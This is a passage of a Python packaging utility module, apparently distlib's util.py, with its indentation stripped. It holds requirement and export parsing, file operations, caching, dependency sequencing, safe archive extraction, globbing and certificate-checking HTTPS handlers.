import tempfile
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
BaseConfigurator, valid_ident, Container, configparser,
URLError, match_hostname, CertificateError, ZipFile)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = '(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + '\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
in os.environ):
result = os.environ['__PYVENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
data = json.load(stream)
result = data['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
cp = configparser.ConfigParser()
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base):
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
